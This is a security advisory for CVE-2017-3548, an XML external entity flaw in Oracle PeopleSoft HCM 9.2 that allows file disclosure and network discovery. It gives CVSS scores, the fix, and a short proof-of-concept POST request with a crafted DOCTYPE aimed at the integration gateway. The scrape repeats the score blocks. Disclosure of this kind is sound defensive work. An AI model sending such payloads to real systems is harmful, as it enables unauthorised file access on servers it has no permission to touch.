6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
0.008 Low
EPSS
Percentile
79.6%
Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor:Oracle **Bugs:**XXE **Reported:**23.12.2016 **Vendor response:**24.12.2016 **Date of Public Advisory:**18.04.2017 **Reference: **Oracle CPU April 2017 Authors: Nadya Krivdyuk (ERPScan)
Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3548
CVSS Base Score: 6.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | Low (L) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | Low (L) |
A malicious user can modify an XML-based request to include XML content that is then parsed locally.
PeopleSoft HCM 9.2 on PeopleTools 8.55
To correct this vulnerability, implement Oracle CPU April 2017
An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests, which will be processed by the XML parser. The attacker can use an XML external entity vulnerability for getting unauthorised access to the OS file system.
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1 Host: 172.16.2.91:8000 Content-type: text/xml <!DOCTYPE a PUBLIC “-//B/A/EN” “C:\windows”>
1
2
3
4
|
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: 172.16.2.91:8000
Content-type: text/xml
<!DOCTYPE a PUBLIC “-//B/A/EN” “C:\windows”>
—|—
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
0.008 Low
EPSS
Percentile
79.6%